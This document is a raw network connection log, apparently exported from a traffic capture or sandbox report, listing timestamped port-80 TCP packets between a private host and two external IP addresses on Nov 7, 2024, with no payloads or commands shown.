                                                                                                                            Nov 7, 2024 10:52:29.013369083 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.013381004 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.013392925 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.013403893 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.013421059 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.013427973 CET4919980192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:29.013433933 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.013441086 CET4919980192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:29.014157057 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.014168978 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.014179945 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.014190912 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.014197111 CET4919980192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:29.014209032 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.014219999 CET4919980192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:29.014250040 CET4919980192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:29.014254093 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.014261961 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.014271975 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.014300108 CET4919980192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:29.014988899 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.015034914 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.015045881 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.015058041 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.015065908 CET4919980192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:29.015070915 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.015090942 CET4919980192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:29.015113115 CET4919980192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:29.017714977 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.017798901 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.017810106 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.017827034 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.017863035 CET4919980192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:29.018106937 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.018315077 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.018332005 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.018362999 CET4919980192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:29.075305939 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.075392008 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.075402975 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.075551987 CET4919980192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:29.075551987 CET4919980192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:29.077476025 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.102874994 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.102961063 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.102972031 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.103122950 CET4919980192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:29.104188919 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.104201078 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.104212046 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.104233027 CET4919980192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:29.104245901 CET4919980192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:29.105017900 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.105149031 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.105159998 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.105186939 CET4919980192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:29.105369091 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.105407000 CET4919980192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:29.105460882 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.105473042 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.105513096 CET4919980192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:29.108639956 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.108675003 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.108685017 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.108711958 CET4919980192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:29.192806959 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.192955017 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.193114996 CET4919980192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:29.531791925 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.546927929 CET4919980192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:30.564220905 CET4920080192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:30.569577932 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:30.569647074 CET4920080192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:30.581115961 CET4920080192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:30.587455988 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.228734016 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.228749037 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.228828907 CET4920080192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:31.229284048 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.229315042 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.229327917 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.229340076 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.229351044 CET4920080192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:31.229355097 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.229371071 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.229377985 CET4920080192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:31.229418039 CET4920080192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:31.229859114 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.229872942 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.229909897 CET4920080192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:31.259902000 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.260632038 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.260675907 CET4920080192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:31.346136093 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.346151114 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.346168041 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.346179962 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.346193075 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.346355915 CET4920080192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:31.346355915 CET4920080192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:31.346606016 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.346620083 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.346631050 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.346642971 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.346669912 CET4920080192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:31.347074032 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.347101927 CET4920080192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:31.432512999 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.432574034 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.432588100 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.432607889 CET4920080192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:31.432655096 CET4920080192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:31.462963104 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.462999105 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.463011980 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.463068008 CET4920080192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:31.463247061 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.463268042 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.463355064 CET4920080192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:31.463424921 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.463438034 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.463449001 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.463509083 CET4920080192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:31.463673115 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.464198112 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.464301109 CET4920080192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:31.549567938 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.550184965 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.550209999 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.550220966 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.550322056 CET4920080192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:31.580102921 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.580132008 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.580143929 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.580360889 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.580461025 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.580485106 CET4920080192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:31.580594063 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.580606937 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.580619097 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.580693960 CET4920080192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:31.580960035 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.581044912 CET4920080192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:31.581227064 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.581240892 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.581360102 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.581367970 CET4920080192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:31.666574001 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.666645050 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.666683912 CET4920080192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:31.697712898 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.697727919 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.697741032 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.697803020 CET4920080192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:31.697803020 CET4920080192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:31.697833061 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.697846889 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.697858095 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.697870970 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.697896957 CET4920080192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:31.698283911 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.698296070 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.698307991 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.698373079 CET4920080192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:31.703131914 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.703176975 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.703192949 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.703382969 CET4920080192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:31.784457922 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.785130024 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:31.785506010 CET4920080192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:32.031604052 CET804920038.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:32.089653015 CET4920080192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:33.106555939 CET4920180192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:33.111788988 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:33.111886024 CET4920180192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:33.123246908 CET4920180192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:33.128129959 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:33.128182888 CET4920180192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:33.128384113 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:33.133174896 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:33.133291960 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:33.780874014 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:33.780972958 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:33.781116962 CET4920180192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:33.781124115 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:33.781136036 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:33.781203985 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:33.781235933 CET4920180192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:33.781270027 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:33.781280994 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:33.781359911 CET4920180192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:33.781403065 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:33.781414986 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:33.781478882 CET4920180192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:33.781562090 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:33.786004066 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:33.786065102 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:33.786076069 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:33.786171913 CET4920180192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:33.786263943 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:33.813153028 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:33.813803911 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:33.813906908 CET4920180192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:33.900434971 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:33.900495052 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:33.900506973 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:33.900603056 CET4920180192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:33.900696039 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:33.900708914 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:33.900780916 CET4920180192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:33.900918961 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:33.900995016 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:33.901093960 CET4920180192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:33.901144028 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:33.901155949 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:33.901664019 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:33.901758909 CET4920180192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:33.901798010 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:33.901809931 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:33.901901960 CET4920180192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:33.932646990 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:33.932702065 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:33.932717085 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:33.932806015 CET4920180192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:34.020540953 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.020555019 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.020668983 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.020776033 CET4920180192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:34.022597075 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.022739887 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.022751093 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.022763014 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.022772074 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.022778988 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.022790909 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.022799969 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.022802114 CET4920180192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:34.022802114 CET4920180192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:34.022813082 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.022825003 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.022855043 CET4920180192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:34.052958012 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.052969933 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.052983046 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.053092957 CET4920180192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:34.053236008 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.139152050 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.139224052 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.139235973 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.139247894 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.139303923 CET4920180192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:34.139636040 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.139648914 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.139738083 CET4920180192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:34.139916897 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.139928102 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.139939070 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.139961958 CET4920180192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:34.140192032 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.140202999 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.140213966 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.140239000 CET4920180192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:34.172245026 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.172269106 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.172280073 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.172297001 CET4920180192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:34.172358990 CET4920180192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:34.172542095 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.258613110 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.258707047 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.258718967 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.258804083 CET4920180192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:34.258970022 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.258981943 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.259203911 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.259217024 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.259218931 CET4920180192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:34.259300947 CET4920180192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:34.259449959 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.259566069 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.259577990 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.259588957 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.259875059 CET4920180192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:34.292082071 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.292171001 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.292184114 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.292273998 CET4920180192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:34.292386055 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.292473078 CET4920180192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:34.523446083 CET804920138.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:34.523499012 CET4920180192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:34.632455111 CET4920180192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:35.711236954 CET4920280192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:35.716413021 CET804920238.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:35.722445965 CET4920280192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:35.727646112 CET804920238.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:35.734534979 CET4920280192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:35.765975952 CET4920280192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:35.765976906 CET4920280192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:35.770979881 CET804920238.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:35.771029949 CET804920238.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:41.076801062 CET4920380192.168.2.22206.119.81.36
                                                                                                                            Nov 7, 2024 10:52:41.082289934 CET8049203206.119.81.36192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:41.086447954 CET4920380192.168.2.22206.119.81.36
                                                                                                                            Nov 7, 2024 10:52:41.094434023 CET4920380192.168.2.22206.119.81.36
                                                                                                                            Nov 7, 2024 10:52:41.099481106 CET8049203206.119.81.36192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:41.099575996 CET8049203206.119.81.36192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:41.099757910 CET4920380192.168.2.22206.119.81.36
                                                                                                                            Nov 7, 2024 10:52:41.104692936 CET8049203206.119.81.36192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:42.059843063 CET8049203206.119.81.36192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:42.245460987 CET8049203206.119.81.36192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:42.245522976 CET4920380192.168.2.22206.119.81.36
                                                                                                                            Nov 7, 2024 10:52:42.604123116 CET4920380192.168.2.22206.119.81.36
                                                                                                                            Nov 7, 2024 10:52:43.621426105 CET4920480192.168.2.22206.119.81.36
                                                                                                                            Nov 7, 2024 10:52:43.626199961 CET8049204206.119.81.36192.168.2.22
